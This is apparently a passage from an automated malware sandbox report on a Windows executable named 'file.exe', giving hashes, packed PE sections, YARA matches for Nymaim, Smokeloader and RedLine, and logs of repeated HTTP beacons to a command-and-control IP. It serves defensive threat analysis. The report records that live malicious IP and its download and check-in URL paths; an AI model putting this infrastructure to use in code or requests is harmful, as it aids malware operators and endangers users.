                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:58:25API Interceptor12058644x Sleep call for process: file.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.156.72.65file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                    • 185.156.72.65/files/download
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                    • 185.156.72.65/files/download
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65/files/download

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ITDELUXE-ASRUfile.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.946695351883144
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:2'028'032 bytes
                    MD5:97e06acdd95db30f5421cd163f25ec93
                    SHA1:fc2e75139c5d25a46c3fa0e7a0ebe032dca3519a
                    SHA256:df1e3b3a4009381af205e8b587bb0f8b199793968dacc09822091a5c218a3002
                    SHA512:70cc4219b97e3be837b5b21fa81e4d514e7c3c347b37588fae4011b234ca6ea7a627491cde6e3e51e7fbd244c2917e1c71d4b9dfdc8e7221b5803c438d31e760
                    SSDEEP:49152:y97wx4fROFtBK7/i87PUMaPBzGY0DTI8SWKG4uODKAJ:EpfYke+dqaYonZD4
                    TLSH:639533F6EEDB0749C40A8D72B04F97207F2AA2C4655B8F1774850019EA27E3D6F94BD8
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

                    File Icon

                    Icon Hash:cfa99b8a8651798d

                    Static PE Info

                    General

                    Entrypoint:0x8ba000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F7704E0903Ah

                    Rich Headers

                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4b57a80x18zeyoifdy
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x650000x3ae00562ba5b761cbd9c130fdde85ca8d36a0False0.9942525875796179data7.933330547933749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x660000x82340x3c003547e842ea3b49bc0b40c0940fdbd5eaFalse0.9262369791666667data7.713040117120127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x700000x29c0000x200405fde40eca904c9947cf1945896f549unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    zeyoifdy0x30c0000x1ad0000x1ace006c53a730537456b86f08837e5951e2faFalse0.9922996438720489data7.949718189685727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    tiucznkd0x4b90000x10000x400a8898745f4a338c61ced4b197a5d3232False0.7744140625data6.099739987808857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4ba0000x30000x22005368705c78079e4c2d025714e7440d0fFalse0.06387867647058823DOS executable (COM)0.7372578603570301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x664600xea8data1.0029317697228144
                    RT_CURSOR0x673080x8a8data1.0049638989169676
                    RT_CURSOR0x67bb00x568data1.0079479768786128
                    RT_CURSOR0x681180xea8data1.0029317697228144
                    RT_CURSOR0x68fc00x8a8PGP Secret Sub-key -1.0049638989169676
                    RT_CURSOR0x698680x568data0.5228260869565218
                    RT_ICON0x4b58080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
                    RT_ICON0x4b58080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
                    RT_ICON0x4b5ed00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
                    RT_ICON0x4b5ed00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
                    RT_ICON0x4b84780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
                    RT_ICON0x4b84780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
                    RT_STRING0x6cea80x252emptyTamilIndia0
                    RT_STRING0x6cea80x252emptyTamilSri Lanka0
                    RT_STRING0x6d0fc0x396emptyTamilIndia0
                    RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
                    RT_STRING0x6d4940x520emptyTamilIndia0
                    RT_STRING0x6d4940x520emptyTamilSri Lanka0
                    RT_STRING0x6d9b40x3eeemptyTamilIndia0
                    RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
                    RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
                    RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
                    RT_GROUP_CURSOR0x6ddfc0x30empty0
                    RT_GROUP_CURSOR0x6de2c0x30empty0
                    RT_GROUP_ICON0x4b88e00x30dataTamilIndia0.9375
                    RT_GROUP_ICON0x4b88e00x30dataTamilSri Lanka0.9375
                    RT_VERSION0x4b89100x254data0.5436241610738255
                    RT_MANIFEST0x4b8b640x152ASCII text, with CRLF line terminators0.6479289940828402

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    TamilIndia
                    TamilSri Lanka

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 30, 2024 09:57:57.956773043 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 09:57:58.077898026 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 09:57:58.077996969 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 09:57:58.078170061 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 09:57:58.198067904 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:19.969733953 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:19.971524000 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:19.971645117 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:20.091506958 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:22.978467941 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:23.098597050 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:23.098692894 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:23.098862886 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:23.218734026 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:45.016894102 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:45.016962051 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:45.017060041 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:45.136970997 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:48.025341034 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:48.145445108 CET8049738185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:48.145523071 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:48.145662069 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:48.265588045 CET8049738185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:56.134947062 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:59.152834892 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:59.272964001 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 09:58:59.273062944 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:59.273277998 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 09:58:59.393105984 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:21.198590040 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:21.198681116 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:21.198797941 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:21.318665981 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:24.216240883 CET4980280192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:24.336313009 CET8049802185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:24.336393118 CET4980280192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:24.336745024 CET4980280192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:24.456670046 CET8049802185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:46.268191099 CET8049802185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:46.268373013 CET4980280192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:46.268549919 CET4980280192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:46.388422012 CET8049802185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:49.279731035 CET4985780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:49.399821997 CET8049857185.156.72.65192.168.2.4
                    Nov 30, 2024 09:59:49.400185108 CET4985780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:49.400449991 CET4985780192.168.2.4185.156.72.65
                    Nov 30, 2024 09:59:49.520369053 CET8049857185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:11.403184891 CET8049857185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:11.403886080 CET4985780192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:11.409225941 CET4985780192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:11.529602051 CET8049857185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:14.455208063 CET4991380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:14.575136900 CET8049913185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:14.575233936 CET4991380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:14.575529099 CET4991380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:14.695388079 CET8049913185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:36.472548962 CET8049913185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:36.472606897 CET4991380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:36.472755909 CET4991380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:36.592607975 CET8049913185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:39.482553005 CET4996980192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:39.603087902 CET8049969185.156.72.65192.168.2.4
                    Nov 30, 2024 10:00:39.606142998 CET4996980192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:39.606142998 CET4996980192.168.2.4185.156.72.65
                    Nov 30, 2024 10:00:39.728549957 CET8049969185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:01.519653082 CET8049969185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:01.519737005 CET4996980192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:01.529406071 CET4996980192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:01.649379015 CET8049969185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:04.684823990 CET5001080192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:04.804868937 CET8050010185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:04.804966927 CET5001080192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:04.805888891 CET5001080192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:04.925858974 CET8050010185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:26.794883013 CET8050010185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:26.794940948 CET5001080192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:26.795331955 CET5001080192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:26.918376923 CET8050010185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:29.812118053 CET5001180192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:29.931994915 CET8050011185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:29.932065964 CET5001180192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:29.932446957 CET5001180192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:30.052334070 CET8050011185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:47.950017929 CET5001180192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:50.966285944 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:51.086976051 CET8050012185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:51.087111950 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:51.087594032 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:51.210621119 CET8050012185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:55.090039968 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.107230902 CET5001380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.227226973 CET8050013185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:58.227299929 CET5001380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.227591991 CET5001380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.347598076 CET8050013185.156.72.65192.168.2.4

                    HTTP Request Dependency Graph

                    • 185.156.72.65

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 09:57:58.078170061 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449737185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 09:58:23.098862886 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449738185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 09:58:48.145662069 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449746185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 09:58:59.273277998 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449802185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 09:59:24.336745024 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449857185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 09:59:49.400449991 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449913185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 10:00:14.575529099 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449969185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 10:00:39.606142998 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.450010185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 10:01:04.805888891 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.450011185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 10:01:29.932446957 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.450012185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 10:01:51.087594032 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.450013185.156.72.65807520C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 10:01:58.227591991 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:03:57:54
                    Start date:30/11/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:2'028'032 bytes
                    MD5 hash:97E06ACDD95DB30F5421CD163F25EC93
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:1.5%
                      Dynamic/Decrypted Code Coverage:5.4%
                      Signature Coverage:3.6%
                      Total number of Nodes:558
                      Total number of Limit Nodes:5
